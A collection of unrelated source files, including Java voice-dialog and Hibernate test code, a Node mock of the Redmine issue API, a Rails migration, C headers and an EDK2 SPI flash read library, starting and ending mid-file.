*/ public void setId(String id) { if (id.equals(Constants.STR_INIT_ONLY_FLAG)) { throw new NullPointerException(Constants.STR_INIT_ONLY_FLAG + " is a reserved key word and cannot be an id."); } this.id = id; populateParamsMap(); } /** * Get the state value * * @return the state value */ public int getState() { return state; } /** * Set the state value * * @param state The new state value */ public void setState(int state) { this.state = state; } /** * Get the errorCode value * * @return the errorCode value */ public int getErrorCode() { return errorCode; } /** * Set the errorCode value * * @param errorCode The new errorCode value */ public void setErrorCode(int errorCode) { this.errorCode = errorCode; } /** * Get the confirm value * * @return the confirm value */ public Boolean getConfirm() { return confirm; } /** * Set the confirm value. * * @param confirm The new confirm value */ public void setConfirm(Boolean confirm) { if (confirm != null) { this.confirm = confirm; } } /** * Get the response of user to the confirmation dialog * * @return the response to confirmatiom dialog * True - the user said 'yes' * False - the user said 'no' * null - the confirmation dialog hasnt taken place yet */ public Boolean getConfirmed() { return confirmed; } /** * Set the response of user to the confirmation dialog * * @param confirmed is new response to confirmation dialog */ public void setConfirmed(Boolean confirmed) { this.confirmed = confirmed; } /** * Get the whether input is valid or not * * @return the whether the input is valid or not true is valid. 
* True - the input is valid * False - the input is invalid * null - the validation hasnt taken place */ public Boolean getIsValid() { return isValid; } /** * Set whether value is valid or not * * @param isValid is new value to indicate whether the input is valid or not */ public void setIsValid(Boolean isValid) { this.isValid = isValid; } /** * Get whether this RDC is invoked as a subdialog * * @return subdialog The subdialog Boolean. */ public Boolean getSubdialog() { return subdialog; } /** * Set whether this RDC is invoked as a subdialog * * @param subdialog The subdialog Boolean. */ public void setSubdialog(Boolean subdialog) { this.subdialog = subdialog; } /** * Get whether the input value is ambiguous or not * * @return whether the input value is ambiguous or not * True - the input value is ambiguous * False, null - the input value is not ambiguous */ public Boolean getIsAmbiguous() { return isAmbiguous; } /** * Set whether the input value is ambiguous or not * * @param isAmbiguous is the new value to indicate whether the input is ambiguous or not */ public void setIsAmbiguous(Boolean isAmbiguous) { this.isAmbiguous = isAmbiguous; } /** * Get what the user said; the utterance of the user * * @return the utterance of the user */ public String getUtterance() { return utterance; } /** * Set what the user said * * @param utterance is the new utterance of the user */ public void setUtterance(String utterance) { this.utterance = utterance; } /** * Get the normalized value for the input * * @return the normalized value of the input */ public String getCanonicalizedValue() { return canonicalizedValue; } /** * Set the normalized value for input * * @param canonicalizedValue is the normalized value of the input */ public void setCanonicalizedValue(String canonicalizedValue) { this.canonicalizedValue = canonicalizedValue; } /** * Get the interpretation for this input * * @return interp the interpretation for this input */ public Map getInterpretation() { return 
interpretation; } /** * Set the interpretation for this input * * @param interp the interpretation for this input */ public void setInterpretation(Map interp) { interpretation = interp; } /** * Get the submit URI for the RDC * * @return the submit URI */ public String getSubmit() { return submit; } /** * Set the submit URI for the RDC * * @param submit - the submit URI */ public void setSubmit(String submit) { this.submit = submit; } /** * Get the grammar path(s) for the RDC * grammars is a read only property * * @return The grammar path(s) */ public List getGrammars() { return grammars; } /** * Add this <code>Grammar</code> object to the list of * grammars for this RDC. * * @param grammar - the <code>Grammar</code> object */ public void setGrammar(Grammar grammar) { this.grammars.add(grammar); } /** * Get whether the user has requested echoing the return value * * @return whether user has requested echo * True - echo has been requested * False, null - echo has not been requested */ public Boolean getEcho() { return echo; } /** * Set whether the user has requested echo * * @param echo - the user's choice to echo the return value */ public void setEcho(Boolean echo) { if (echo != null) { this.echo = echo; } } /** * Get the list of ambiguous values * * @return the map containing the list of ambiguous values */ public Map getAmbiguousValues() { return this.ambiguousValues; } /** * Set the map of ambiguous values * * @param ambigValues A map containing the ambiguous values */ public void setAmbiguousValues(Map ambigValues) { this.ambiguousValues = ambigValues; } /** * Get the Configuration value. * @return the Configuration value. */ public Document getConfiguration() { return configuration; } /** * Set the Configuration value. * @param newConfiguration The new Configuration value. */ public void setConfiguration(Document newConfiguration) { this.configuration = newConfiguration; } /** * The bean subclassing this instance. * Read only property. 
* * @return className */ public String getClassName() { return className; } /** * Get the value currently associated with the RDC * * @return the value */ public Object getValue() { return value; } /** * Set the value for this RDC instance. Update the isValid and * canonicalizedValue properties based on the new value. * * @param value The value returned by the client */ public void setValue(Object value) { if (value != null) { this.value = baseCanonicalize(value); setIsValid(baseValidate(this.value, true)); if (getIsValid() == Boolean.TRUE) { setCanonicalizedValue(calculateCanonicalizedValue(this.value)); } } } /** * Gets the initial value * * @return The default/initial value */ public Object getInitial() { return initial; } /** * Sets the initial value for this RDC. * Inheriting RDC beans that override this method must also take * responsibility for populating the initial grammar when appropriate. * * @param initial The default/initial value */ public void setInitial(Object initial) { if (initial != null) { this.initial = canonicalize(initial, true); if (this.initial != null) { // find appropriate place to validate if(baseValidate(this.initial, false) == Boolean.TRUE) { populateInitialGrammar(); } else { this.initial = null; grammars.remove(initialGrammar); } } } } /** * Get the skipSubmit value * * @return skipSubmit */ public Boolean getSkipSubmit() { return skipSubmit; } /** * Set the skipSubmit value. * An RDC will be asked to refrain from submitting its results * if a container or component higher up in the heirarchy takes * responsibility for submitting the results. * Example: First interaction turn of a mixed initiative dialog. 
* * @param newSkipSubmit */ public void setSkipSubmit(Boolean newSkipSubmit) { this.skipSubmit = newSkipSubmit; } /** * Get the minConfidence * * @return minConfidence the current value */ public float getMinConfidence() { return minConfidence; } /** * Set the minConfidence * * @param minConfidence the new value */ public void setMinConfidence(float minConfidence) { if (minConfidence > 0.0F) { this.minConfidence = minConfidence; } } /** * Get the n-best data string * * @return the serialized n-best data */ public String getCandidates() { return candidates; } /** * Set the candidates (serialized n-best data string). * Treatment depends on whether this component instance implements * the ValueInterpreter interface. * * @param candidates The serialized n-best results from the vxml browser * @see ValueInterpreter interface */ public void setCandidates(String candidates) { if (candidates.equals("MAX_NOINPUT")) { setExitStatus(Constants.EXIT_MAXNOINPUT); return; } else if (candidates.equals("MAX_NOMATCH")) { setExitStatus(Constants.EXIT_MAXNOMATCH); return; } this.candidates = candidates; NBestResults nbRes = new NBestResults(); nbRes.setNBestResults(candidates); int i = 0, numResults = nbRes.getNumNBest(); setErrorCode(ERR_NONE); // clear error code from previous input Object curValue = null; do { utterance = nbRes.getNthUtterance(i); interpretation = nbRes.getNthInterpretation(i); if (RDCUtils.implementsInterface(this.getClass(), ValueInterpreter.class)) { ((ValueInterpreter) this).setValueFromInterpretation(); } else { curValue = interpretation.get(Constants.STR_EMPTY); setValue(curValue); } } while (!isValid.booleanValue() && ++i < numResults && nbRes.getNthConfidence(i) > minConfidence); } /** * Get numNBest * * @return the maximum number of n-best values that the browser * will be asked to return */ public int getNumNBest() { return numNBest; } /** * Set numNBest * * @param numNBest the new maximum number of n-best values requested */ public void setNumNBest(int 
numNBest) { if (numNBest > 0) { this.numNBest = numNBest; } } /** * Get paramsMap - read-only property, no setter * * @return paramsMap */ public Map getParamsMap() { return paramsMap; } /** * Get the exitStatus value * * @return the exitStatus value */ public int getExitStatus() { return exitStatus; } /** * Set the exitStatus value * * @param exitStatus The new exitStatus value */ public void setExitStatus(int exitStatus) { this.exitStatus = exitStatus; } /** * Get the maxNoInput value * * @return Returns the maxNoInput. */ public int getMaxNoInput() { return maxNoInput; } /** * Set the maxNoInput value * * @param maxNoInput The maxNoInput to set. */ public void setMaxNoInput(int maxNoInput) { this.maxNoInput = maxNoInput; } /** * Get the maxNoMatch value * * @return Returns the maxNoMatch. */ public int getMaxNoMatch() { return maxNoMatch; } /** * Set the maxNoMatch value * * @param maxNoMatch The maxNoMatch to set. */ public void setMaxNoMatch(int maxNoMatch) { this.maxNoMatch = maxNoMatch; } /** * Set the Locale (String) for this RDC * * @param locale The locale (String) to set. */ public void setLocale(String locale) { if (RDCUtils.isStringEmpty(locale)) { return; } this.locale = locale; Locale newLocale = null; /* * Use - as delimiter for StringTokenizer, in line with IETF RFC 3066 * http://www.ietf.org/rfc/rfc3066.txt */ // No NPE catch since tokens won't be null if (locale.indexOf('-') == -1) { newLocale = new Locale(locale); } else { StringTokenizer localeToks = new StringTokenizer(locale, "-"); String lang = localeToks.nextToken(); String country = localeToks.nextToken(); newLocale = localeToks.hasMoreTokens() ? new Locale(lang, country, localeToks.nextToken()) : new Locale(lang, country); } if (newLocale == null) { return; } this.rdcLocale = newLocale; this.rdcResourceBundle = ResourceBundle.getBundle(Constants. 
STR_RDC_RESOURCE_BUNDLE, rdcLocale); } /** * Get the Locale (String) for this RDC * * @return locale The locale (String) */ public String getLocale() { return locale; } /** * Returns the Locale for this RDC, if it was set, or the default * Locale for this deployment * * @return Locale Returns the Locale for this RDC */ public Locale getRdcLocale() { // rdcLocale is transient, reclaim if necessary if (rdcLocale == null && !RDCUtils.isStringEmpty(locale)) { setLocale(locale); } if (rdcLocale == null) { rdcLocale = Constants.rdcLocale; } return rdcLocale; } /** * Return the resourceBundle. * * @return Returns the resourceBundle. */ public ResourceBundle getRdcResourceBundle() { // rdcResourceBundle is transient, reclaim if necessary if (rdcResourceBundle == null && !RDCUtils.isStringEmpty(locale)) { setLocale(locale); } if (rdcResourceBundle == null) { rdcResourceBundle = Constants.rdcResourceBundle; } return rdcResourceBundle; } /** * Transforms canonical data from client to its the corresponding value. * * @param input the value * @return the canonicalized value */ protected Object baseCanonicalize(Object input) { if (input instanceof String && "initial".equalsIgnoreCase((String)input)) { // user has selected initial value return initial; } return canonicalize(input, false); } /** * Validates the input against the given constraints. * Inheriting RDC bean must override this method to do any custom * validation. * * @return TRUE if valid, FALSE otherwise */ protected Boolean baseValidate(Object newValue, boolean setErrorCode) { if (errorCode != ERR_NONE) { // canonicalization failed, it has also set error code return Boolean.FALSE; } if (newValue == null) { // shouldn't be here // this will be reached only if the user selects initial value // when no such value is available if (setErrorCode) setErrorCode(ERR_NO_DEFAULT); return Boolean.FALSE; } return validate(newValue, setErrorCode); } /** * Hook for custom canonicalization. 
* Inheriting RDC bean must override this method to do any custom * canonicalization. * * @param input the value * @return the canonicalized value */ protected Object canonicalize(Object input, boolean isAttribute) { return input; } /** * Hook for custom validation. * Inheriting RDC bean must override this method to do any custom * validation. * * @return TRUE if valid, FALSE otherwise */ protected Boolean validate(Object newValue, boolean setErrorCode) { return Boolean.TRUE; } /** * Hook for custom canonicalized value calculation. * Inheriting RDC bean must override this method to do any custom * calculation of the canonical value. * * @return String The canonical value */ protected String calculateCanonicalizedValue(Object value) { // By default, use utterance return this.utterance; } /** * Create the request parameter and bean property mapping * */ private void populateParamsMap() { paramsMap.put(getId() + "ResultNBest", "candidates"); paramsMap.put(getId() + "Confirm", "confirmed"); } /** * Feed in the initial grammar * */ private void populateInitialGrammar() { MessageFormat initGramFormat = new MessageFormat(rdcResourceBundle. getString(PROPERTY_INITIAL_GRAMMAR), rdcLocale); Object[] args = { getId() }; initialGrammar = new Grammar(initGramFormat.format(args), Boolean.FALSE, Boolean.TRUE, DEFAULT_INITIAL_GRAMMAR_NAME); grammars.add(initialGrammar); } /** * Return the serialized value collected by this RDC, used * primarily as the value returned when this RDC is invoked by * a subdialog (means it goes out as a request parameter). */ public String getSerializedValue() { if (this.value == null) { // HTTP param value will be empty string return ""; } return this.value.toString(); } /** * Interface used by components to interpret the results sent * back from the vxml browser/client. 
* * Since value has type Object and is component specific, * the subclassing RDC should provide the mechanism to convert the * av pairs obtained from the serialized vxml interpretation * into the Object corresponding to its value. * * The subclassing RDC does not require to implement this interface if * its value is a String and its receives no named av pairs from client. * * @author <NAME> */ public interface ValueInterpreter { /** * Use the current value of the interpretation property of this * instance to determine the current value of the &quot;value&quot; * property. This method should also update the isValid and * canonicalizedValue properties based on the new value of the * &quot;value&quot; property. */ public void setValueFromInterpretation(); } }
midnightbr/Faculdade
java/JARS/hibernate-release-5.6.0.Final/project/hibernate-core/src/test/java/org/hibernate/test/schemaupdate/QuotedTableNameSchemaUpdateTest.java
/*
 * Hibernate, Relational Persistence for Idiomatic Java
 *
 * License: GNU Lesser General Public License (LGPL), version 2.1 or later.
 * See the lgpl.txt file in the root directory or <http://www.gnu.org/licenses/lgpl-2.1.html>.
 */
package org.hibernate.test.schemaupdate;

import java.io.File;
import java.io.IOException;
import java.nio.charset.Charset;
import java.nio.file.Files;
import java.util.EnumSet;
import java.util.List;
import javax.persistence.Entity;
import javax.persistence.Id;
import javax.persistence.Table;

import org.hibernate.boot.MetadataSources;
import org.hibernate.boot.registry.StandardServiceRegistry;
import org.hibernate.boot.registry.StandardServiceRegistryBuilder;
import org.hibernate.boot.spi.MetadataImplementor;
import org.hibernate.cfg.AvailableSettings;
import org.hibernate.tool.hbm2ddl.SchemaExport;
import org.hibernate.tool.hbm2ddl.SchemaUpdate;
import org.hibernate.tool.schema.TargetType;

import org.hibernate.testing.Skip;
import org.hibernate.testing.TestForIssue;
import org.hibernate.testing.junit4.BaseUnitTestCase;
import org.junit.After;
import org.junit.Before;
import org.junit.Test;

import static org.hamcrest.core.Is.is;
import static org.junit.Assert.assertThat;

/**
 * Regression test: SchemaUpdate must recognize an already-existing table whose
 * name is quoted (e.g. {@code "QuotedTable"}) instead of re-emitting DDL for it.
 *
 * @author <NAME>
 */
public class QuotedTableNameSchemaUpdateTest extends BaseUnitTestCase {

	// Temp file that collects SQL emitted by SchemaUpdate; it should stay empty
	// when the update correctly detects the table created earlier in the test.
	private File output;
	private StandardServiceRegistry ssr;

	@Before
	public void setUp() throws IOException {
		output = File.createTempFile( "update_script", ".sql" );
		output.deleteOnExit();
		// HBM2DDL_CREATE_SCHEMAS=true so the export below may create schemas as needed.
		ssr = new StandardServiceRegistryBuilder().applySetting( AvailableSettings.HBM2DDL_CREATE_SCHEMAS, "true" )
				.build();
	}

	// NOTE(review): method name contains a typo ("tearsDown"); harmless because
	// JUnit invokes it via the @After annotation, not by name.
	@After
	public void tearsDown() {
		StandardServiceRegistryBuilder.destroy( ssr );
	}

	@Test
	@TestForIssue(jiraKey = "<KEY>")
	@Skip(condition = Skip.OperatingSystem.Windows.class, message = "On Windows, MySQL is case insensitive!")
	public void testSchemaUpdateWithQuotedTableName() throws Exception {
		final MetadataSources metadataSources = new MetadataSources( ssr );
		metadataSources.addAnnotatedClass( QuotedTable.class );
		MetadataImplementor metadata = (MetadataImplementor) metadataSources.buildMetadata();
		metadata.validate();

		// First create the quoted table in the database...
		new SchemaExport()
				.setOutputFile( output.getAbsolutePath() )
				.setFormat( false )
				.create( EnumSet.of( TargetType.DATABASE ), metadata );

		// ...then run an update against the same metadata; it should emit no SQL.
		new SchemaUpdate().setHaltOnError( true )
				.setOutputFile( output.getAbsolutePath() )
				.setFormat( false )
				.execute( EnumSet.of( TargetType.DATABASE, TargetType.SCRIPT ), metadata );

		final List<String> sqlLines = Files.readAllLines( output.toPath(), Charset.defaultCharset() );
		assertThat( "The update should recognize the existing table", sqlLines.isEmpty(), is( true ) );

		// Clean up: drop the table created above.
		new SchemaExport().setHaltOnError( true )
				.setOutputFile( output.getAbsolutePath() )
				.setFormat( false )
				.drop( EnumSet.of( TargetType.DATABASE ), metadata );
	}

	// Entity mapped to a quoted (case-sensitive) table name.
	@Entity(name = "QuotedTable")
	@Table(name = "\"QuotedTable\"")
	public static class QuotedTable {
		@Id
		long id;
	}
}
tonioshikanlu/tubman-hack
sources/b/l/d/q/f/g/b.java
package b.l.d.q.f.g; import b.e.a.a.a; import b.l.d.q.f.i.v; import java.util.Objects; public final class b extends z { public final v a; /* renamed from: b reason: collision with root package name */ public final String f5060b; public b(v vVar, String str) { Objects.requireNonNull(vVar, "Null report"); this.a = vVar; Objects.requireNonNull(str, "Null sessionId"); this.f5060b = str; } public v a() { return this.a; } public String b() { return this.f5060b; } public boolean equals(Object obj) { if (obj == this) { return true; } if (!(obj instanceof z)) { return false; } z zVar = (z) obj; return this.a.equals(zVar.a()) && this.f5060b.equals(zVar.b()); } public int hashCode() { return ((this.a.hashCode() ^ 1000003) * 1000003) ^ this.f5060b.hashCode(); } public String toString() { StringBuilder y = a.y("CrashlyticsReportWithSessionId{report="); y.append(this.a); y.append(", sessionId="); return a.q(y, this.f5060b, "}"); } }
saranshbht/bsc-codes
semester-6/Python Practice/numpyPractice/program4.py
import numpy as np x = np.array([1, 0, 0, 0]) print("Original array:") print(x) print("Test if any of the elements of a given array is non-zero:") print(np.any(x)) x = np.array([0, 0, 0, 0]) print("Original array:") print(x) print("Test if any of the elements of a given array is non-zero:") print(np.any(x))
onmyway133/Runtime-Headers
macOS/10.13/CoreData.framework/NSXPCStoreManagedObjectArchivingToken.h
<gh_stars>10-100 /* Generated by RuntimeBrowser Image: /System/Library/Frameworks/CoreData.framework/Versions/A/CoreData */ @interface NSXPCStoreManagedObjectArchivingToken : NSObject <NSCoding, NSSecureCoding> { NSURL * _managedObjectReferenceURI; } + (BOOL)supportsSecureCoding; - (id)URI; - (void)dealloc; - (void)encodeWithCoder:(id)arg1; - (id)initWithCoder:(id)arg1; - (id)initWithURI:(id)arg1; - (BOOL)isEqual:(id)arg1; @end
xiaozhu36/alibaba-cloud-sdk-go
services/reid/struct_accurate_overview_detail.go
package reid //Licensed under the Apache License, Version 2.0 (the "License"); //you may not use this file except in compliance with the License. //You may obtain a copy of the License at // //http://www.apache.org/licenses/LICENSE-2.0 // //Unless required by applicable law or agreed to in writing, software //distributed under the License is distributed on an "AS IS" BASIS, //WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. //See the License for the specific language governing permissions and //limitations under the License. // // Code generated by Alibaba Cloud SDK Code Generator. // Changes may cause incorrect behavior and will be lost if the code is regenerated. // AccurateOverviewDetail is a nested struct in reid response type AccurateOverviewDetail struct { StayDeepAvgWOWPercent string `json:"StayDeepAvgWOWPercent" xml:"StayDeepAvgWOWPercent"` StayDeepAvg string `json:"StayDeepAvg" xml:"StayDeepAvg"` UvAvgWOWPercent string `json:"UvAvgWOWPercent" xml:"UvAvgWOWPercent"` StayAvgPeriodWOWPercent string `json:"StayAvgPeriodWOWPercent" xml:"StayAvgPeriodWOWPercent"` UvWOWPercent string `json:"UvWOWPercent" xml:"UvWOWPercent"` UvEverySqmGrowthWOWPercent string `json:"UvEverySqmGrowthWOWPercent" xml:"UvEverySqmGrowthWOWPercent"` Uv int64 `json:"Uv" xml:"Uv"` UvEverySqm string `json:"UvEverySqm" xml:"UvEverySqm"` UvAvg string `json:"UvAvg" xml:"UvAvg"` StayAvgPeriod string `json:"StayAvgPeriod" xml:"StayAvgPeriod"` }
hunterBhough/epahomeratingapp-ui
common-ui/js/components/jobs/jobs-search/search-filter-inspection-stage/search-filter-inspection-stage.controller.js
<reponame>hunterBhough/epahomeratingapp-ui import _find from 'lodash/find'; class SearchFilterInspectionStageController { constructor ($stateParams, UI_ENUMS) { 'ngInject'; this.$stateParams = $stateParams; this.param = UI_ENUMS.SEARCH_PARAMS.INSPECTION_STAGE; this.options = Object.assign({}, UI_ENUMS.ANY, UI_ENUMS.CATEGORY_PROGRESS); } $onInit () { if (this.$stateParams[this.param]) { this.inspectionStage = [this.$stateParams[this.param]]; } else { this.reset(); } this.registerFilter({ filter : { reset : this.reset.bind(this), serialize : this.serialize.bind(this) } }); } reset () { this.inspectionStage = [this.options.Any.Key]; } setInspectionStage (result) { this.inspectionStage = result; } serialize () { let filter; if (this.inspectionStage[0] !== this.options.Any.Key) { let stageObject; stageObject = _find(this.options, (stage) => { return stage.Key === this.inspectionStage[0]; }); filter = { filterKey : this.param, filterName : stageObject.Name, param : {} }; filter.param[this.param] = this.inspectionStage[0]; } return filter; } } export default SearchFilterInspectionStageController;
chengdh/manage-huo-baby
db/migrate/20110125131136_create_journals.rb
# -*- encoding : utf-8 -*- #coding: utf-8 #coding: utf-8 #coding: utf-8 #日记账 class CreateJournals < ActiveRecord::Migration def self.up create_table :journals do |t| t.references :org,:null => false t.date :bill_date,:null => false t.references :user #已结算未汇金额 t.decimal :settled_no_rebate_fee,:precision => 15,:scale => 2,:default => 0 #已提货未结算金额 t.decimal :deliveried_no_settled_fee,:precision => 15,:scale => 2,:default => 0 #可录入项目1,2,3 t.string :input_name_1,:limit => 20 t.decimal :input_fee_1,:precision => 15,:scale => 2,:default => 0 t.string :input_name_2,:limit => 20 t.decimal :input_fee_2,:precision => 15,:scale => 2,:default => 0 t.string :input_name_3,:limit => 20 t.decimal :input_fee_3,:precision => 15,:scale => 2,:default => 0 #库存现金 t.decimal :cash,:precision => 15,:scale => 2,:default => 0 #银行存款 t.decimal :deposits,:precision => 15,:scale => 2,:default => 0 #返程货款 t.decimal :goods_fee,:precision => 15,:scale => 2,:default => 0 #短途运费及赔偿 t.decimal :short_fee,:precision => 15,:scale => 2,:default => 0 #其他开支 t.decimal :other_fee,:precision => 15,:scale => 2,:default => 0 #黑票 t.integer :black_bills,:default => 0 #红票 t.integer :red_bills,:default => 0 #黄票 t.integer :yellow_bills,:default => 0 #绿票 t.integer :green_bills,:default => 0 #蓝票 t.integer :blue_bills,:default => 0 #白票 t.integer :white_bills,:default => 0 #客户欠款 #当日欠款 t.decimal :current_debt,:precision => 15,:scale => 2,:default => 0 #2-3日欠款 t.decimal :current_debt_2_3,:precision => 15,:scale => 2,:default => 0 #4-5日欠款 t.decimal :current_debt_4_5,:precision => 15,:scale => 2,:default => 0 #6日以上欠款 t.decimal :current_debt_ge_6,:precision => 15,:scale => 2,:default => 0 t.text :note t.timestamps end end def self.down drop_table :journals end end
IBM/suro-oaas
suro-oaas/suro-oaas-redmine/src/main/resources/redmine-mock/app.js
var express = require('express') var bodyParser = require('body-parser') var app = express() // initialise issue Id with 1 (will be incremented) var issueId = 1; // create parser var jsonParser = bodyParser.json() // declare functions to check if values are defined and/or have the right format function isDefined(obj) { return (obj !== undefined && obj.trim() != ""); } function isNumber(obj) { return (obj !== undefined && !isNaN(obj)); } // POST /api/users gets JSON bodies app.post('/issues.json', jsonParser, function (req, res) { if (!req.body) return res.status(400).end(); if (req.body === undefined || req.body.issue === undefined) { return res.status(400).end(); } var issue = req.body.issue; // validate issue request if (isDefined(issue.subject) && isDefined(issue.description) && isNumber(issue.project_id) && isNumber(issue.tracker_id) && isNumber(issue.priority_id) && isNumber(issue.status_id)) { // determine current date for creation date var dateNow = new Date(); // set request headers (content type and return code) res.setHeader('content-type', 'application/json'); res.writeHead(201) // write API response res.end(JSON.stringify({ "issue": { "id": issueId, "project": { "id": issue.project_id, "name": "MockProject" }, "tracker": { "id": issue.tracker_id, "name": "MockTracker" }, "status": { "id": issue.status_id, "name": "MockStatus" }, "priority": { "id": issue.priority_id, "name": "MockPriority" }, "author": { "id": 1337, "name": "<NAME>" }, "subject": issue.subject, "description": issue.description, "start_date": dateNow.getFullYear() + "-" + dateNow.getMonth() + "-" + dateNow.getDate(), "done_ratio": 0, "custom_fields": [], "created_on": dateNow, "updated_on": dateNow } })); // increment the issue Id for the next issue issueId++; return res; } else { // validation failed, return 400 (invalid) return res.status(400) .end(); } }); // listen to port 3001 app.listen(3000);
sandialabs/avatar
src/array.h
/**********************************************************************************
Avatar Tools
Copyright (c) 2019, National Technology and Engineering Solutions of Sandia, LLC
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this list
of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice, this
list of conditions and the following disclaimer in the documentation and/or other
materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its contributors may
be used to endorse or promote products derived from this software without specific
prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY
EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT
SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR
BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH
DAMAGE.

For questions, comments or contributions contact <NAME>, <EMAIL>
*******************************************************************************/
/*
 * Array utility declarations: sorting (plain and paired "shuffle" sorts),
 * searching, range parsing, string tokenizing and simple statistics.
 */
#ifndef AVATAR_ARRAY_H
/* FIX: the guard was "__ARRAY__"; identifiers beginning with a double
 * underscore are reserved for the implementation (C11 7.1.3), so the guard
 * is renamed. No other code should reference the guard macro directly. */
#define AVATAR_ARRAY_H

/* Sort direction selector used by the index/sort helpers below. */
typedef enum {
    ASCENDING, DESCENDING
} Sort_Order;

/* Paired sorts: sort array1 and apply the identical permutation to array2. */
void shuffle_sort_float_int(int size, float *array1, int *array2, int order);
void shuffle_sort_int_int(int size, int *array1, int *array2, int order);
void int_array_sort(int n, int *array);
void int_two_array_sort(int n, int *ra, int *rb);
//void float_index_table(int n, float *arrin, int **indx, int order);
void float_int_array_sort(int n, float *ra, int *rb);
//void int_index_table(int n, int *arrin, int **indx, int order);
void float_array_sort(int n, float *array);
//int array_union(int *array_a, int size_a, int *array_b, int size_b, int **Union);
//int array_intersection(int *array_a, int size_a, int *array_b, int size_b, int **Intersection);
//int array_diff(int *array_a, int size_a, int *array_b, int size_b, int **InANotB);

/* Searching and de-duplication. */
int length_of_uid(int *array);
void array_print(int *array, int size, char *title);
int find_int(int value, int size, int *array);
void find_int_release();
int remove_dups_int(int num, int *array);

/* Range/string parsing: turn delimited text into numeric ranges or tokens. */
void parse_int_range(const char *str, int sort, int *num, int **range);
void parse_delimited_string(char delimiter, char *str, int *num, char ***tokens);
void _parse_comma_sep_string(char *str, int *num, char ***tokens);
void parse_space_sep_string(char *str, int *num, char ***tokens);
void parse_float_range(char *str, int sort, int *num, float **range);
int int_find_max(int *array, int size, int *max);
int array_to_range(const int *array, int num, char **range);

/*
 * Delete leading and trailing whitespace from str.
 *
 * Pre: str != NULL
 * Post: Any whitespace that was prefixed or suffixed on str is removed.
 *       The pointer str points to beginning of remaining content.
 *
 * NB: this function modifies the given string in place.
 */
void strip_lt_whitespace(char* str);

/* Simple statistics over the inclusive index range [start, end]. */
/* NOTE(review): whether `end` is inclusive or exclusive is not visible from
 * this header — confirm against the definitions in array.c. */
float int_average(int *array, int start, int end);
float float_average(float *array, int start, int end);
float int_stddev(int *array, int start, int end);
float float_stddev(float *array, int start, int end);

#endif // AVATAR_ARRAY_H
smnarayanan/slimbootloader
BootloaderCommonPkg/Library/SpiBlockIoLib/SpiBlockIoLib.c
/** @file
  This file provides some helper functions via run time service support
  specific to SPI flash device.

  Copyright (c) 2017, Intel Corporation. All rights reserved.<BR>
  SPDX-License-Identifier: BSD-2-Clause-Patent

**/

#include <Library/BaseLib.h>
#include <Library/SpiBlockIoLib.h>
#include <Library/BootloaderCommonLib.h>

// Cached pointer to the platform SPI flash service; resolved in InitializeSpi().
SPI_FLASH_SERVICE   *mSpiService = NULL;

/**
  Initialize a SPI instance.

  Looks up the SPI flash service registered elsewhere in the bootloader and
  caches it for the read helpers below.

  @param[in]  SpiPciBase      The PCI base of the SPI flash device.
  @param[in]  DevInitPhase    The initialization phase to prepare the device.

  @retval EFI_SUCCESS         The driver is successfully initialized.
  @retval EFI_UNSUPPORTED     The call is unsupported.
  @retval Others              Can't initialize the SPI device.
**/
EFI_STATUS
EFIAPI
InitializeSpi (
  IN  UINTN               SpiPciBase,
  IN  DEVICE_INIT_PHASE   DevInitPhase
  )
{
  EFI_STATUS  Status;

  if (DevInitPhase == DevDeinit) {
    // Handle Deinit if required.
    return EFI_SUCCESS;
  }

  // Resolve the SPI flash service by its registered signature.
  mSpiService = (SPI_FLASH_SERVICE *) GetServiceBySignature (SPI_FLASH_SERVICE_SIGNATURE);
  if (mSpiService == NULL) {
    return EFI_UNSUPPORTED;
  }

  Status = mSpiService->SpiInit ();
  return Status;
}

/**
  This function reads blocks from the SPI slave device.

  @param[in]  RegionType   The region type of the SPI area to read from.
  @param[in]  Address      The block address in the RegionType to read from on the SPI.
  @param[in]  BufferSize   Size of the Buffer in bytes.
  @param[out] Buffer       Pointer to caller-allocated buffer containing the data received during the SPI cycle.

  @retval EFI_SUCCESS             SPI command completes successfully.
  @retval EFI_NO_MEDIA            Address was the 0xFFFFFFFF "no media" sentinel.
  @retval EFI_DEVICE_ERROR        Device error, the command aborts abnormally.
  @retval EFI_ACCESS_DENIED       Some unrecognized or blocked command encountered in hardware sequencing mode.
  @retval EFI_UNSUPPORTED         The call is unsupported.
  @retval EFI_INVALID_PARAMETER   The parameters specified are not valid.
**/
EFI_STATUS
EFIAPI
SpiReadBlocks (
  IN  UINTN                         RegionType,
  IN  EFI_PEI_LBA                   Address,
  IN  UINTN                         BufferSize,
  OUT VOID                          *Buffer
  )
{
  EFI_STATUS  Status;

  if (mSpiService == NULL) {
    return EFI_UNSUPPORTED;
  }

  // 0xFFFFFFFF serves as a "no media" sentinel block address.
  if (Address == 0xFFFFFFFF) {
    return EFI_NO_MEDIA;
  }

  // NOTE(review): the RegionType parameter is ignored here — the read is
  // always issued against FlashRegionAll, with Address interpreted as a
  // block offset from the start of the whole flash. Confirm whether
  // per-region addressing was intended.
  Status = mSpiService->SpiRead (FlashRegionAll, (UINT32) (Address * SPI_BLOCK_SIZE), (UINT32)BufferSize, Buffer);
  return Status;
}

/**
  Gets a SPI device's media information.

  This function will provide the caller with the specified SPI device's media
  information. If the media changes, calling this function will update the
  media information accordingly.

  @param[in]  RegionType     Didn't use now.
